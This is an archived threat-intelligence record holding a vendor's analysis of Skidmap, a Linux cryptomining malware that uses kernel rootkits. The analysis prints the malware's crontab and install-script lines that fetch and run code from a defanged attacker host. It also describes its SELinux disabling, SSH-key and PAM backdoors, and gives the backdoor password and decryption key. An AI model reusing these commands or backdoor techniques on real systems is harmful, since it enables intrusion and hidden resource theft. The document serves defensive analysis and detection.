{
	"id": "8f930696-a467-4125-a5d0-3b8f72af5c40",
	"created_at": "2026-04-06T00:08:46.382848Z",
	"updated_at": "2026-04-10T13:12:14.730251Z",
	"deleted_at": null,
	"sha1_hash": "dfa0daf8b5dc677a57d01f068173733c74cd73b2",
	"title": "Skidmap Malware Uses Rootkit to Hide Mining Payload",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85650,
	"plain_text": "Skidmap Malware Uses Rootkit to Hide Mining Payload\r\nPublished: 2019-09-16 · Archived: 2026-04-05 18:03:23 UTC\r\nCryptocurrency-mining malware is still a prevalent threat, as illustrated by our detections of this threat in the first half of 2019. Cybercriminals have also increasingly explored new platforms and ways to further cash in on their malware — from mobile devices and Unix and Unix-like systems to servers and cloud environments.\r\nThey also constantly hone their malware’s resilience against detection. Some, for instance, bundle their malware with a watchdog component that ensures that the illicit cryptocurrency-mining activity persists on the infected machine, while others, targeting Linux-based systems, use an LD_PRELOAD-based userland rootkit to make their components undetectable by system monitoring tools.\r\nSkidmap, a Linux malware that we recently came across, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency-mining operations under the radar.\r\nThese kernel-mode rootkits are not only more difficult to detect than their user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: Skidmap can also set up a secret master password that gives it access to any user account on the system. Note also that, since many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether exploits, misconfigurations, or exposure to the internet — is most likely the same one that gives the attacker root or administrative access to the system.\r\nFigure 1. Skidmap’s infection chain\r\nSkidmap’s infection chain\r\nThe malware installs itself on its target machine via crontab (a list of commands that are run on a regular schedule), as shown below:\r\n*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh\r\nThe installation script pm.sh then downloads the main binary “pc” (detected by Trend Micro as Trojan.Linux.SKIDMAP.UWEJX):\r\nif [ -x \"/usr/bin/wget\" -o -x \"/bin/wget\" ]; then\r\n  wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc\r\nelif\r\n  curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc\r\nelif\r\n  get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc\r\nelif\r\n  cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc\r\nelse\r\n  url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc \u0026\u0026 chmod +x /var/lib/pc \u0026\u0026 /var/lib/pc\r\nfi\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/\r\nPage 1 of 4\r\nWhen executed, the “pc” binary lowers the affected machine’s security settings. If the file /usr/sbin/setenforce exists, the malware executes the command setenforce 0. This command puts the system’s Security-Enhanced Linux (SELinux) module, which supports the system's access control policies, into permissive mode — that is, the SELinux policy is no longer enforced. If the system has the /etc/selinux/config file, the malware writes the settings SELINUX=disabled and SELINUXTYPE=targeted into that file. The former disables the SELinux policy (or prevents one from being loaded), while the latter sets selected processes to run in confined domains.\r\nSkidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add its handlers’ public key to the authorized_keys file, which contains the keys accepted for authentication.\r\nBesides this backdoor access, Skidmap also creates another way for its operators to get into the machine. The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version (detected as Backdoor.Linux.PAMDOR.A). As shown in Figure 2, this malicious pam_unix.so file accepts a specific password for any user, thus allowing the attackers to log in as any user on the machine.\r\nFigure 2. Code snippets showing how Skidmap gets its backdoor access to the affected system (top) and how it uses a malicious version of the pam_unix.so file to gain access to the machine (bottom; the password that it uses and accepts is Mtm$%889*G*S3%G)\r\nHow Skidmap drops the cryptocurrency miner\r\nThe “pc” binary checks whether the infected system’s OS is Debian or RHEL/CentOS. Its routine, which involves dropping the cryptocurrency miner and other components, depends on the OS. For Debian-based systems, it drops the cryptocurrency miner payload to /tmp/miner2. For CentOS/RHEL systems, it downloads a tar (tape archive) file from the URL hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz containing the cryptocurrency miner and its multiple components, which is unpacked and then installed. Of note, the content of the tar file is decrypted via OpenSSL with the key “jcx@076” using the Triple DES cipher.\r\nFigure 3. How the “pc” binary drops the cryptocurrency miner in Debian- (top) and CentOS/RHEL-based systems (bottom)\r\nSkidmap’s other malicious components\r\nThe malware has notable components that are meant to further obfuscate its malicious activities and ensure that they continue to run:\r\nA fake “rm” binary — One of the components contained in the tar file is a fake “rm” binary that replaces the original (rm is normally the command used to delete files). The malicious routine of this file sets up a malicious cron job that downloads and executes a file. This routine won’t always be observed, however, as it is only performed at random.\r\nkaudited — A file installed as /usr/bin/kaudited. This binary drops and installs several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash because of the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that monitors the cryptocurrency miner file and process.\r\nFigure 4. Cron job installed by Skidmap’s “rm” (top) and kaudited (middle) dropping the kernel modules; and code snippet of the dropped watchdog component (bottom)\r\niproute — This module hooks the getdents system call (normally used to read the contents of a directory) in order to hide specific files.\r\nFigure 5. Code snippets showing how iproute uses getdents to hide certain files (top, center), and how the netlink rootkit fakes network traffic statistics (bottom)\r\nnetlink — This rootkit fakes the network traffic statistics (specifically traffic involving certain IP addresses and ports) and CPU-related statistics (hiding the “pamdicks” process and the CPU load). This makes the CPU load of the infected machine always appear low, which is likely intended to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag for cryptocurrency-mining malware).\r\nFigure 6. Snapshots of code showing how the pamdicks process is hidden (top), and how it displays that the CPU load is low (bottom)\r\nBest practices and Trend Micro solutions\r\nSkidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean than other malware. In addition, Skidmap has multiple ways to access affected machines, which allows it to reinfect systems that have been restored or cleaned up.\r\nCryptocurrency-mining threats don’t just affect a server or workstation’s performance — they can also translate to higher expenses and even disrupt businesses, especially if the affected systems are used to run mission-critical operations. Given Linux’s use in many enterprise environments, its users, particularly administrators, should always adopt best practices: keep systems and servers updated and patched (or use virtual patching for legacy systems); beware of unverified, third-party repositories; and enforce the principle of least privilege to prevent suspicious and malicious executables or processes from running.\r\nTrend Micro solutions powered by XGen™ security, such as ServerProtect for Linux and Trend Micro Network Defense, can detect related malicious files and URLs and protect users’ systems. Trend Micro Smart Protection Suites and Trend Micro Worry-Free™ Business Security, which have behavior monitoring capabilities, can additionally protect against these types of threats by detecting malicious files, thwarting behaviors and routines associated with malicious activities, and blocking all related malicious URLs.\r\nIndicators of Compromise (IoCs)\r\nFile Name | SHA-256 | Trend Micro Detection\r\ncrypto514 | c07fe8abf4f8ba83fb95d44730efc601ba9a7fc340b3bb5b4b2b2741b5e31042 | Rootkit.Linux.SKIDMAP.A\r\niproute514 | 3ae9b7ca11f6292ef38bd0198d7e7d0bbb14edb509fdeee34167c5194fa63462 | Rootkit.Linux.SKIDMAP.A\r\nkaudited | e6eb4093f7d958a56a5cd9252a4b529efba147c0e089567f95838067790789ee | Trojan.Linux.SKIDMAP.UWEJY\r\nkswaped | 240ad49b6fe4f47e7bbd54530772e5d26a695ebae154e1d8771983d9dce0e452 | Backdoor.Linux.SKIDMAP.A\r\nnetlink514 | 945d6bd233a4e5e9bfb2d17ddace46f2b223555f60f230be668ee8f20ba8c33c | Rootkit.Linux.SKIDMAP.A\r\nsystemd_network | 913208a1a4843a5341231771b66bb400390bd7a96a5ce3af95ce0b80d4ed879e | Trojan.Linux.SKIDMAP.A\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/"
	],
	"report_names": [
		"skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434126,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.pdf",
		"text": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.txt",
		"img": "https://archive.orkl.eu/dfa0daf8b5dc677a57d01f068173733c74cd73b2.jpg"
	}
}